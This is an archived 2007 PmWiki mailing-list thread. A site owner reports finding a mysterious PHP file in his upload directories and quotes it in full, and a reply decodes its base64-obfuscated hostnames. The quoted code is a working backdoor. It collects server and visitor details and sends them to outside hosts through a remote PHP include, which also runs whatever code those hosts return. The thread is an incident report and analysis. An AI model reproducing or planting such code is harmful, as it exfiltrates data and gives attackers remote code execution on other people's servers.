[pmwiki-users] FW: Mysterious php file appears in upload directory

Peter K.H. Gragert p.k.h.gragert at skyaccess.nl
Sat Apr 28 12:09:31 CDT 2007 

The bas64 strings mean:
http://www3.rssnews.ws
http://www3.xmldata.info
All the SEVER-info of .. are given to: ... these http addresses ...(base 64
encoded)
PKHG

> -----Oorspronkelijk bericht-----
> Van: pmwiki-users-bounces at pmichaud.com [mailto:pmwiki-users-
> bounces at pmichaud.com] Namens Dr Fred C
> Verzonden: zaterdag 28 april 2007 18:35
> Aan: PmWiki Users
> Onderwerp: [pmwiki-users] Mysterious php file appears in upload directory
> 
> I went to upload a file to one of my wikis this morning and, while that
> went fine, I noticed a curious 43248.php file that had been uploaded to
> this upload directory, last night around 2:30 am.   I checked with my
> FTP program and quite a number of my various wikis had a similar php
> file in the uploads directorys, and in the wiki.d directory -- always
> with a different # for the file name, always of the same size.
> 
> I downloaded it and it contained this info.
> 
> <? error_reporting(0);$s="e";$a=(isset($_SERVER["HTTP_HOST"]) ?
> $_SERVER["HTTP_HOST"] : $HTTP_HOST);$b=(isset($_SERVER["SERVER_NAME"]) ?
> $_SERVER["SERVER_NAME"] :
> $SERVER_NAME);$c=(isset($_SERVER["REQUEST_URI"]) ?
> $_SERVER["REQUEST_URI"] : $REQUEST_URI);$d=(isset($_SERVER["PHP_SELF"])
> ? $_SERVER["PHP_SELF"] : $PHP_SELF);$e=(isset($_SERVER["QUERY_STRING"])
> ? $_SERVER["QUERY_STRING"] :
> $QUERY_STRING);$f=(isset($_SERVER["HTTP_REFERER"]) ?
> $_SERVER["HTTP_REFERER"] :
> $HTTP_REFERER);$g=(isset($_SERVER["HTTP_USER_AGENT"]) ?
> $_SERVER["HTTP_USER_AGENT"] :
> $HTTP_USER_AGENT);$h=(isset($_SERVER["REMOTE_ADDR"]) ?
> $_SERVER["REMOTE_ADDR"] :
> $REMOTE_ADDR);$i=(isset($_SERVER["SCRIPT_FILENAME"]) ?
> $_SERVER["SCRIPT_FILENAME"] :
> $SCRIPT_FILENAME);$j=(isset($_SERVER["HTTP_ACCEPT_LANGUAGE"]) ?
> $_SERVER["HTTP_ACCEPT_LANGUAGE"] :
> $HTTP_ACCEPT_LANGUAGE);$str=base64_encode($a).".".base64_encode($b).".".ba
> se64_encode($c).".".base64_encode($d).".".base64_encode($e).".".base64_enc
> ode($f).".".base64_encode($g).".".base64_encode($h).".$s.".base64_encode($
> i).".".base64_encode($j);
> if
> ((include(base64_decode("aHR0cDovLw==").base64_decode("d3d3My5yc3NuZXdzLnd
> z")."/?".$str))){}
> else
> {include(base64_decode("aHR0cDovLw==").base64_decode("d3d3My54bWxkYXRhLmlu
> Zm8=")."/?".$str);}
> ?>
> 
> --------
> Any ideas on what is going on here?
> 
> --
> 
> Always, Dr Fred C
> drfredc at drfredc.com
> 
> 
> _______________________________________________
> pmwiki-users mailing list
> pmwiki-users at pmichaud.com
> http://www.pmichaud.com/mailman/listinfo/pmwiki-users

More information about the pmwiki-users mailing list